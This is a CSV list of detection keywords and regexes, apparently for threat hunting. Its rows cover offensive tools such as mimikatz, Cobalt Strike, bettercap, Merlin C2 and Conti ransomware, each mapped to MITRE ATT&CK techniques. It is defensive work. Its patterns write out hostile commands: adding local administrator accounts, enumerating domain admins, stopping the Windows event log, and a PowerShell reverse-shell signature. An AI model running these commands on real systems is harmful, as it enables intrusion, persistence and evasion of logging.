"*ncrack-services*",".{0,1000}ncrack\-services.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*ndDelegation.py*",".{0,1000}ndDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ndp_spoof.*",".{0,1000}ndp_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*Ne0nd0g/merlin*",".{0,1000}Ne0nd0g\/merlin.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Ne0nd0g/merlin-agent*",".{0,1000}Ne0nd0g\/merlin\-agent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*Ne0nd0g/merlin-agent-dll*",".{0,1000}Ne0nd0g\/merlin\-agent\-dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a 
post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*needle_sift.x64*",".{0,1000}needle_sift\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" "*Needles without the Thread.pptx*",".{0,1000}Needles\swithout\sthe\sThread\.pptx.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" 
"*needlesift.cna*",".{0,1000}needlesift\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" "*Nemesis frontend HTTP server endpoint*",".{0,1000}Nemesis\sfrontend\sHTTP\sserver\sendpoint.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis:Qwerty12345@*",".{0,1000}nemesis\:Qwerty12345\@.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" 
"*nemesis@nemesis.com*",".{0,1000}nemesis\@nemesis\.com.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis@nemesis.local*",".{0,1000}nemesis\@nemesis\.local.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*NEMESIS_API_URL*",".{0,1000}NEMESIS_API_URL.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*NEMESIS_HTTP_SERVER *",".{0,1000}NEMESIS_HTTP_SERVER\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis_post_file(*",".{0,1000}nemesis_post_file\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis-rabbitmq-discovery*",".{0,1000}nemesis\-rabbitmq\-discovery.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*nemesis-rabbitmq-discovery.default.svc.cluster.local*",".{0,1000}nemesis\-rabbitmq\-discovery\.default\.svc\.cluster\.local.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*NemesisRabbitMQProducer*",".{0,1000}NemesisRabbitMQProducer.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*neo2john.py*",".{0,1000}neo2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*neo4jconnection.py*",".{0,1000}neo4jconnection\.py.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*neoneggplant*",".{0,1000}neoneggplant.{0,1000}","offensive_tool_keyword","Github Username","author of RAT tools on github","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nessus* --set 
listen_address=127.0.0.1*",".{0,1000}nessus.{0,1000}\s\-\-set\slisten_address\=127\.0\.0\.1.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.deb*",".{0,1000}Nessus\-.{0,1000}\.deb.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.dmg*",".{0,1000}Nessus\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.msi*",".{0,1000}Nessus\-.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.rpm*",".{0,1000}Nessus\-.{0,1000}\.rpm.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.tar.gz*",".{0,1000}Nessus\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability 
scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.txz*",".{0,1000}Nessus\-.{0,1000}\.txz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*nessus_vulns_cleaner.rc*",".{0,1000}nessus_vulns_cleaner\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*nessuscli fetch*",".{0,1000}nessuscli\sfetch.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*nessuscli fix*",".{0,1000}nessuscli\sfix.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*nessus-updates*.tar.gz*",".{0,1000}nessus\-updates.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*net domain_controllers*",".{0,1000}net\sdomain_controllers.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America.
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*net group *domain admins* /domain*",".{0,1000}net\sgroup\s.{0,1000}domain\sadmins.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","net","Conti Ransomware Proxyshell PowerShell command #9","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*net group *Enterprise Admins* /dom*",".{0,1000}net\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/dom.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*net group / domain *Domain Admins*",".{0,1000}net\sgroup\s\/\sdomain\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*net localgroup administrators /add troll*",".{0,1000}net\slocalgroup\sadministrators\s\/add\stroll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*net localgroup administrators 
icebreaker*",".{0,1000}net\slocalgroup\sadministrators\sicebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*net start SysUpdate*",".{0,1000}net\sstart\sSysUpdate.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*net stop \""windows event log\""*",".{0,1000}net\sstop\s\\\""windows\sevent\slog\\\"".{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*net user /add icebreaker 
*",".{0,1000}net\suser\s\/add\sicebreaker\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*net user HackMe *",".{0,1000}net\suser\sHackMe\s.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*net user john H4x00r123*",".{0,1000}net\suser\sjohn\sH4x00r123.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*net user john H4x00r123*",".{0,1000}net\suser\sjohn\sH4x00r123.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*net users /add troll Trolololol123*",".{0,1000}net\susers\s\/add\stroll\sTrolololol123.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - 
TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*net.fuzz *",".{0,1000}net\.fuzz\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*net.fuzz.*",".{0,1000}net\.fuzz\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*net.probe on",".{0,1000}net\.probe\son","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*net.probe on*",".{0,1000}net\.probe\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - 
TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*net.sniff *",".{0,1000}net\.sniff\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*net.sniff.*",".{0,1000}net\.sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*Net.Sockets.TCPClient*Net.Security.SslStream*AuthenticateAsClient*Invoke-Expression*Out-String*",".{0,1000}Net\.Sockets\.TCPClient.{0,1000}Net\.Security\.SslStream.{0,1000}AuthenticateAsClient.{0,1000}Invoke\-Expression.{0,1000}Out\-String.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*net::alias*",".{0,1000}net\:\:alias.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::deleg*",".{0,1000}net\:\:deleg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*net::group*",".{0,1000}net\:\:group.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
